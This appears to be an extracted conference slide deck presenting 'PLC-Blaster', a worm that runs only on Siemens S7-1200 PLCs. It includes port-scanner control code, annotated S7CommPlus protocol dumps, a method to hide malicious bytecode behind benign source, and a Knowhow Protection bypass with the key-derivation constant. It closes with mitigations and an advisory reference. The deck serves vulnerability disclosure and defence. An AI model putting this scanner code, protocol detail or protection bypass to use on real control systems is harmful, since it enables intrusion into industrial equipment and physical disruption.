## PLC-BLASTER ###### A Worm Living Solely in the PLC ----- ##### Linux Security ##### Pentesting Embedded Systems ##### Pentesting RFID Systems ##### Pentesting Industrial Control Systems ----- ##### Built for small applications ##### 50kb RAM ##### 1MB persistent memory ##### Built-in Ethernet ##### V3.0 & TIAv11 ----- ----- ##### OB (OrganizationBlock): Entry point ##### FB (FunctionBlock): Class with one method ##### SFB (SystemFunctionBlock) Library ##### FC (Function): Function ##### SFC(SystemFunction) Library ##### DB (DataBlock): Global memory ----- ###### Ladder Diagram Function Block Diagram Instruction List ###### Sequential Function Chart ###### Structured Text ----- ##### Target discovery?Target discovery? ##### CarrierCarrier ##### ActivationActivation ##### PayloadsPayloads ----- ##### TCP port 102 is open on all S7-PLCs ##### Implement a portscanner ###### – TCON: Open a new TCP connection – TDISCON: Close a TCP connection ----- ``` IF "data".con_state = 10 THEN "TCON_DB"(REQ:="data".action, ID:=1, DONE=>"data".con_done, BUSY=>"data".con_busy, ERROR=>"data".con_error, STATUS=>"data".con_status, CONNECT:="data".con_param); IF "data".con_done = True THEN "data".con_state := 20; "data".con_timeout_counter := 0; ELSE "data".con_timeout_counter := "data".con_timeout_counter + 1; IF "data".con_timeout_counter > 200 THEN "data".con_state := 0; END_IF; END_IF; GOTO CYCLE END; ``` ----- ``` IF "data".con_state = 0 THEN "TDISCON_DB"(REQ:="data".action, ID:=1, DONE=>"data".con_done, BUSY=>"data".con_busy, ERROR=>"data".con_error, STATUS=>"data".con_status); IF "data".con_error = True OR "data".con_done = True THEN "data".con_param.REM_STADDR[4] := ("data".con_param.REM_STADDR[4] + 1) MOD 255; "data".con_timeout_counter := 0; "data".con_state := 10; END_IF; GOTO CYCLE_END; END_IF; ``` ----- ##### Target discovery  ###### – Portscanner (TCP 102); TCON, DISCON ##### Carrier? ##### Activation ##### Payloads ----- ##### Program transfer via TCP to the PLC ##### Implement the transfer protocol ###### – TSEND, TRCV ----- ##### S7CommPlus ###### – Binary – Proprietary – Huge differences compared to the old S7-300/400 protocol ###### TPKT ###### S7CommPlus ###### ISO8073 Class 0 ###### – Modified in S7-1200v4 and S7-1500 – Transfer of programs – Start/Stop CPU – Read/Write process variables ###### TCP ###### IP ----- ###### Message 1: Connection setup Magic TPKT ISO8073 Version ###### Len ###### Type ###### Reserved ###### Sub-Type ``` 00000023 03 00 00 df 02 f0 80 72 01 00 d0 31 00 00 04 ca .......r ...1.... 00000033 00 00 00 02 00 00 01 20 36 00 00 01 1d 00 04 00 ....... 6.......Seq no. 00000043 00 00 00 00 a1 00 00 00 d3 82 1f 00 00 a3 81 69 ........ .......i 00000053 00 15 16 53 65 72 76 65 72 53 65 73 73 69 6f 6e ...Serve rSession 00000063 5f 33 33 32 33 34 41 37 41 a3 82 21 00 15 2c 31 _33234A7 A..!..,1 00000073 3a 3a 3a 36 2e 30 3a 3a 54 43 50 2f 49 50 20 2d :::6.0:: TCP/IP ­ 00000083 3e 20 49 6e 74 65 6c 28 52 29 20 50 52 4f 2f 31 > Intel( R) PRO/1 00000093 30 30 30 20 4d 54 20 44 2e 2e 2e a3 82 28 00 15 000 MT D .....(.. 000000A3 00 a3 82 29 00 15 00 a3 82 2a 00 15 0f 4d 41 49 ...).... .*...MAI 000000B3 4b 2d 50 43 5f 32 32 33 30 39 30 36 a3 82 2b 00 K­PC_223 0906..+. 000000C3 04 01 a3 82 2c 00 12 00 2d c6 c0 a3 82 2d 00 15 ....,... ­....­.. 000000D3 00 a1 00 00 00 d3 81 7f 00 00 a3 81 69 00 15 15 ........ ....i... 000000E3 53 75 62 73 63 72 69 70 74 69 6f 6e 43 6f 6e 74 Subscrip tionCont 000000F3 61 69 6e 65 72 a2 a2 00 00 00 00 72 01 00 00 ainer... ...r... ``` |01|00 d0|31|00 00|04 ca| |---|---|---|---|---| |TPKT|ISO8073|V| |---|---|---| |03 00 00 df|02 f0 80|72| |00 00 00 02||| ###### Frame-End-Delimiter ----- ###### Message 1: Connection setup Magic TPKT ISO8073 Version ###### Len ###### Type ###### Reserved ###### Sub-Type ``` 00000023 03 00 00 df 02 f0 80 72 01 00 d0 31 00 00 04 ca .......r ...1.... 00000033 00 00 00 02 00 00 01 20 36 00 00 01 1d 00 04 00 ....... 6.......Seq no. 00000043 00 00 00 00 a1 00 00 00 d3 82 1f 00 00 a3 81 69 ........ .......i 00000053 00 15 16 53 65 72 76 65 72 53 65 73 73 69 6f 6e ...Serve rSession 00000063 5f 33 33 32 33 34 41 37 41 a3 82 21 00 15 2c 31 _33234A7 A..!..,1 00000073 3a 3a 3a 36 2e 30 3a 3a 54 43 50 2f 49 50 20 2d :::6.0:: TCP/IP ­ 00000083 3e 20 49 6e 74 65 6c 28 52 29 20 50 52 4f 2f 31 > Intel( R) PRO/1 00000093 30 30 30 20 4d 54 20 44 2e 2e 2e a3 82 28 00 15 000 MT D .....(.. 000000A3 00 a3 82 29 00 15 00 a3 82 2a 00 15 0f 4d 41 49 ...).... .*...MAI 000000B3 4b 2d 50 43 5f 32 32 33 30 39 30 36 a3 82 2b 00 K­PC_223 0906..+. 000000C3 04 01 a3 82 2c 00 12 00 2d c6 c0 a3 82 2d 00 15 ....,... ­....­.. 000000D3 00 a1 00 00 00 d3 81 7f 00 00 a3 81 69 00 15 15 ........ ....i... 000000E3 53 75 62 73 63 72 69 70 74 69 6f 6e 43 6f 6e 74 Subscrip tionCont 000000F3 61 69 6e 65 72 a2 a2 00 00 00 00 72 01 00 00 ainer... ...r... ``` |01|00 d0|31|00 00|04 ca| |---|---|---|---|---| |TPKT|ISO8073|V| |---|---|---| |03 00 00 df|02 f0 80|72| |00 00 00 02||| |Col1|Col2|00 49 52 82 0f| |---|---|---| |||a3| ||a3|| |a3||| ###### Frame-End-Delimiter ----- ###### Attribute-Block start ``` a3 81 69 ........ .......i 00000053 00 15 16 53 65 72 76 65 72 53 65 73 73 69 6f 6e ...Serve rSession 00000063 5f 33 33 32 33 34 41 37 41 _33234A7 A ``` ----- ###### Datatype ###### Attribut-Block start ID ###### Format? Len ``` a3 81 69 ........ .......i 00000053 00 15 16 53 65 72 76 65 72 53 65 73 73 69 6f 6e ...Serve rSession 00000063 5f 33 33 32 33 34 41 37 41 _33234A7 A ``` |Attribut-Block sta Datatype Len at?|Col2|Col3|Col4|Col5|art|ID| |---|---|---|---|---|---|---| |t? Len|||||a3|81 69| |00|15|16|53 65 72 76 65 72 53 65 73 73 69 6f 6e|||| |5f 33 33 32 33 34 41 37 41||||||| ###### Value ----- ``` a3 81 69 ........ .......i 00000053 00 15 16 53 65 72 76 65 72 53 65 73 73 69 6f 6e ...Serve rSession 00000063 5f 33 33 32 33 34 41 37 41 _33234A7 A ###### Byte is following 81 69 = 10000001 01101001 → 233 ``` (16) (2) (10) ###### 16 = 00010110 → 22 (16) (2) (10) ----- ###### Message 2: Connection setup ``` 000000A3 a2 00 00 00 00 72 01 00 00 22 +80 = A2 ``` (16) (16) (16) ----- ###### Message 3: Connection setup ``` 0000010B 03 00 00 8c 02 f0 80 72 02 00 7d 31 0000012B 32 01 00 17 00 00 01 3a 82 3b 00 04 0000018B 00 04 00 00 00 00 00 00 72 02 00 00 22 +80 = A2 ``` (16) (16) (16) ----- ###### Message: Download block |8a 32|00 01| |---|---| ----- ##### Transfer Attributes: ###### – Some are used by the PLC – Some are used by TIA in case of program retrieval ###### LastModified (0x9315) ###### LoadMemorySize (0x9316) ###### IdentES (0x9311) ###### WorkingMemorySize (0x9313) ###### Comment (0xa140) ###### InterfaceModified (0x936f) ###### InterfaceDescription (0x9370) ###### LineComments (0x9372) ###### BlockNumber (0x9359) ###### BlockLanguage (0x935b) ###### KnowhowProtected (0x935c) ###### Unlinked (0x935f) ###### Fprotection (0x9360) ###### RuntimeModified (0x9361) - BodyDescription (0x9365) - Binding (0x984f) ###### OptimizeInfo (0x9369) ###### TOblockSetNumber (0x9c23) ###### TypeInfo (0xa362) - Code (0x9414) - ParameterModified (0x9415) - NetworkComments (0x9418) - NetworkTitles (0x9419) - CalleeList (0x941a) - InterfaceSignature (0x941b) - DebugInfo (0x941d) - LocalErrorHandling (0x941e) - LongConstants (0x941f) - intRefData (0x9417) ----- ##### Data redundancy creates attack surface ``` 00000901 03 00 04 00 02 f0 00 72 02 05 a9 31 00 00 04 ca .......r ...1.... 00000911 00 00 00 1d 00 00 03 a2 34 00 00 00 03 00 04 00 ........ 4....... 00000921 00 00 00 00 a1 8a 32 00 01 94 57 20 00 a3 81 69 ......2. ..W ...i . . . . 00000C71 53 77 65 65 70 20 28 43 79 63 6c 65 29 22 00 a3 Sweep (C ycle)".. 00000C81 93 59 00 03 00 01 a3 93 5a 00 01 00 a3 93 5b 00 .Y...... Z.....[. ###### Which one is evaluated by Siemens? Blocknumber ``` |03|00 01| |---|---| ----- ##### Data redundancy creates attack surface ``` 00000901 03 00 04 00 02 f0 00 72 02 05 a9 31 00 00 04 ca .......r ...1.... 00000911 00 00 00 1d 00 00 03 a2 34 00 00 00 03 00 04 00 ........ 4....... 00000921 00 00 00 00 a1 8a 32 00 01 94 57 20 00 a3 81 69 ......2. ..W ...i . . . . 00000C71 53 77 65 65 70 20 28 43 79 63 6c 65 29 22 00 a3 Sweep (C ycle)".. 00000C81 93 59 00 03 00 01 a3 93 5a 00 01 00 a3 93 5b 00 .Y...... Z.....[. ###### Which one is evaluated by Siemens? Both! ``` |03|00 01| |---|---| ----- ##### Allows you to download hidden blocks ##### Choose an existing blocknumber ##### TIA Portal recognizes only the original block ##### Not working with data blocks ----- ##### The code is transferred in two variants ###### Source code in XML displayed by TIA ``` . . ``` ###### Byte code executed by the PLC ``` 02 4c 00 00 e0 02 4c 04 00 e0 02 4c 08 00 e0 02 4c 0c 00 e0 02 4c 10 00 e0 02 4c 14 00 f8 18 58 02 f8 18 58 06 18 40 01 f8 70 00 04 01 02 1a 40 05 6f 00 2c 7c 00 01 6c 01 68 00 68 01 14 40 01 ``` ----- ##### Allows you to make your program source code look unsuspicious ##### But actually malicious binary code is executed ----- ##### Some attribute blocks can be left out ##### You don't need to ship your worm's source code ##### Reduce the amount of data ----- ##### Implement the worm using TIA: ###### – connection setup – Anti-replay-protection – Create empty data blocks for messages ##### Transfer the worm to the PLC with TIA and capture pcaps ##### Retrieve the messages from the pcaps ##### Store the messages in the empty DBs ##### Inject the worm with your own tool ----- ##### Target discovery  ###### – Portscanner (TCP 102); TCON, DISCON ##### Carrier  ###### – Implement the S7-Protocol; TSEND, TRCV ##### Activation? ##### Payloads ----- ##### OB (OrganizationBlock): int main() ##### Additional OBs are supported ##### OBs are executed sequentially ##### Original user program is untouched ----- ##### Target discovery  ###### – Portscanner (TCP 102); TCON, DISCON ##### Carrier  ###### – Implement the S7-Protocol; TSEND, TRCV ##### Activation  ###### – Built-in ##### Payloads ----- ##### DoS ##### Arbitrary manipulation of outputs ##### TCP-Functions ###### – C&C-Server – Proxy ##### ... ----- ##### Target discovery  ###### – Portscanner (TCP 102); TCON, DISCON ##### Carrier  ###### – Implement the S7-Protocol; TSEND, TRCV ##### Activation  ###### – Built-in ##### Payloads  ###### – A lot of possibilities ----- ###### Injection ###### Attacker ###### C&C Server ----- ###### Spread ###### Attacker ###### C&C Server ----- ###### Attacker ###### Connect back to the C&C Server C&C Server ----- ##### Program execution is stopped ###### – Approximately 10s ##### Generates a log entry in the PLC ##### Possible worm improvements: patch existing OB1 ###### – Worm is more complex ----- ##### Memory usage ###### – 38,5kb RAM – 216,6kb persistent memory |– 216,6kb pers|sistent memory|Col3| |---|---|---| |Model|RAM|Persistent Memory| |S7-1211|50kb (77%)|1Mb (21%)| |S7-1212|75kb (51%)|1MB (5 %)| |S7-1214|100kb (38%)|4MB (5 %)| |S7-1215|125kb (30%)|4MB (5 %)| |S7-1217|150kb (25%)|4MB (5 %)| ----- ##### Cycle time ###### – Default cycle time: 150ms – Worm: max 7ms (4,7%) ----- ##### Remove the worm: ###### – Factory-Reset of the PLC – Override worm OB ##### The TIA-Portal recognizes the worm ----- ----- ----- ##### S7-1200 provides 3 protection mechanisms: ###### – Knowhow Protection – Copy Protection – Access Protection ----- ##### Prevents unauthorized reading or modification of the code ##### Password protection ##### Source-Code is AES encrypted ###### Knowhow Attribute Block ``` 0000 A3 93 5C 00 17 00 00 0D 77 9A 78 00 0B 00 01 9A .......w.x...... 0010 79 10 02 14 E8 F9 7F BA 91 04 D1 EA 50 47 94 8E y...........PG.. 0020 6D FB 67 FA CD 9F 5B 73 00 m.g...[s. SHA-1 hash of password ``` ###### Enable-Flag ----- ##### How to disable the Knowhow Protection? ###### – Set enable flag to: ``` 0x00, 0x00 ``` ##### Problem: source-code is still AES encrypted ##### How is the AES-Key generated? ----- ##### Key derived from the hash: ``` K = truncate128Bit(SHA­1 HASH) XOR M M = 0x28,0x6f,0x76,0x5c,0x6e,0x3b,0x1e,0x4c, 0xd0,0x8e,0x42,0x31,0x43,0x7b,0x8e,0xbf ``` ##### Siemens Security Advisory: SSA-833048 ----- ##### Knowhow Protection is ineffective: ###### – Broken – Only protects existing POUs ----- ##### Restricts the program for use only with a specific PLC ##### Change of serial number possible ##### Attribute Block not evaluated by the PLC (client-side protection) ##### Ineffective ##### Siemens Security Advisory: SSA-833048 ###### Serial number Copy Attribute Block ----- ##### Limits S7CommPlus features ###### – By Password ##### Works ##### By default disabled |Function|Off|Write- Protection|Write/Read- Protection| |---|---|---|---| |Start/Stop CPU|y|n|n| |Transfer Program to PLC|y|n|n| |Retrieve Program from PLC|y|y|n| |Edit Output/Input/Memory|y|y|y| |Read Identification|y|y|y| |Assign IP-Adress|y|y|y| |Set time of day|y|n|n| |Reset|y|n|n| ----- ##### Vendor ###### – Access protection enabled by default – Integrity protection using checksums – Disable connections via TCON to port 102 ##### User ###### – Enable the access protection – Firewall restrictions (PLC opens the connection) ----- ##### PLC features required by the worm: ###### – Industrial Ethernet – Program transfer via TCP to the PLC – Programmable TCP functions ----- Vendor Product Ethernet Transfer TCP/UDP TCP/IP Functions ###### All leading vendors Rockwell Automation SLC 500 Ja Ja Ja C |Vendor|Product|Ethernet|Transfer TCP/UDP|TCP/IP Functions| |---|---|---|---|---| |||||| |Siemens|S7-300|Ja|Ja|Ja| |Siemens|S7-400|Ja|Ja|Ja| |Tes Siemens●|t S7-1200|Ja|Ja|Ja| |Siemens|S7-1500|Ja|Ja|Ja| |Tes Mitsubishi Electric ●|t MELSEC iQ-R|Ja|Ja|Ja| |Mitsubishi Electric|MELSEC iQ-F|Ja|Ja|Ja| |Mitsubishi Electric ●|MELSEC-Q|Ja|Ja|Ja| |Mitsubishi Electric|MELSEC-L|Ja|Ja|Ja| |Mitsubishi Electric|MELSEC-F|Ja|Ja|Nein| |Mitsubishi Electric|MELSEC-QS/WS|Ja|Ja|Nein| |Schneider Electric|Modicon Easy M|Nein|Nein|Nein| |Schneider Electric|Modicon M|Ja|Ja|Nein| |Schneider Electric|Modicon LM|Ja|Ja|Nein| |Schneider Electric|Modicon Premium|Ja|Ja|Nein| |Schneider Electric|Modicon Quantum|Ja|Ja|Nein| |Schneider Electric|Preventa XPS Quantum|Ja|Ja|Nein| |Rockwell Automation|ControlLogix|Ja|Ja|Ja| |Rockwell Automation|CompactLogix|Ja|Ja|Ja| |Rockwell Automation|MicroLogix|Ja|Ja|Ja| |Rockwell Automation|SmartGuard 600|Ja|Ja|Nein| |Rockwell Automation|SLC 500|Ja|Ja|Ja| ----- Vendor Product Ethernet Transfer TCP/UDP TCP/IP Functions ###### All leading vendors supporting Industrial Ethernet and TCP/UDP transfer in their PLCs |Vendor|Product|Ethernet|Transfer TCP/UDP|TCP/IP Functions| |---|---|---|---|---| |Siemens|S7-300|Ja|Ja|Ja| |||||| |Siemens|S7-400|Ja|Ja|Ja| |Tes Siemens●|t S7-1200|Ja|Ja|Ja| |Siemens|S7-1500|Ja|Ja|Ja| |Tes Mitsubishi Electric ●|t MELSEC iQ-R|Ja|Ja|Ja| |Mitsubishi Electric|MELSEC iQ-F|Ja|Ja|Ja| |Mitsubishi Electric ●|MELSEC-Q|Ja|Ja|Ja| |Mitsubishi Electric|MELSEC-L|Ja|Ja|Ja| |Mitsubishi Electric|MELSEC-F|Ja|Ja|Nein| |Mitsubishi Electric|MELSEC-QS/WS|Ja|Ja|Nein| |Schneider Electric|Modicon Easy M|Nein|Nein|Nein| |Schneider Electric|Modicon M|Ja|Ja|Nein| |Schneider Electric|Modicon LM|Ja|Ja|Nein| |Schneider Electric|Modicon Premium|Ja|Ja|Nein| |Schneider Electric|Modicon Quantum|Ja|Ja|Nein| |Schneider Electric|Preventa XPS Quantum|Ja|Ja|Nein| |Rockwell Automation|ControlLogix|Ja|Ja|Ja| |Rockwell Automation|CompactLogix|Ja|Ja|Ja| |Rockwell Automation|MicroLogix|Ja|Ja|Ja| |Rockwell Automation|SmartGuard 600|Ja|Ja|Nein| |Rockwell Automation|SLC 500|Ja|Ja|Ja| R k ll A t ti PLC 5 J J J ----- Vendor Product Ethernet Transfer TCP/UDP TCP/IP Functions ###### All leading vendors supporting Industrial Ethernet and TCP/UDP transfer in their PLCs ###### All leading vendors supporting additionally TCP/IP functions |Vendor|Product|Ethernet|Transfer TCP/UDP|TCP/IP Functions| |---|---|---|---|---| |Siemens|S7-300|Ja|Ja|Ja| |||||| |Siemens|S7-400|Ja|Ja|Ja| |Tes Siemens●|t S7-1200|Ja|Ja|Ja| |Siemens|S7-1500|Ja|Ja|Ja| |Tes Mitsubishi Electric ●|t MELSEC iQ-R|Ja|Ja|Ja| |Mitsubishi Electric|MELSEC iQ-F|Ja|Ja|Ja| |Mitsubishi Electric ●|MELSEC-Q|Ja|Ja|Ja| |Mitsubishi Electric|MELSEC-L|Ja|Ja|Ja| |Mitsubishi Electric|MELSEC-F|Ja|Ja|Nein| |Mitsubishi Electric|MELSEC-QS/WS|Ja|Ja|Nein| |Schneider Electric|Modicon Easy M|Nein|Nein|Nein| |Schneider Electric|Modicon M|Ja|Ja|Nein| |Schneider Electric|Modicon LM|Ja|Ja|Nein| |Schneider Electric|Modicon Premium|Ja|Ja|Nein| |Schneider Electric|Modicon Quantum|Ja|Ja|Nein| |Schneider Electric|Preventa XPS Quantum|Ja|Ja|Nein| |Rockwell Automation|ControlLogix|Ja|Ja|Ja| |Rockwell Automation|CompactLogix|Ja|Ja|Ja| |Rockwell Automation|MicroLogix|Ja|Ja|Ja| |Rockwell Automation|SmartGuard 600|Ja|Ja|Nein| |Rockwell Automation|SLC 500|Ja|Ja|Ja| R k ll A t ti PLC 5 J J J ----- ##### Analysis of more PLC vendors and models ##### Infection via fieldbus protocols ----- # Q&A ###### http://opensource-security.de info@os-s.de -----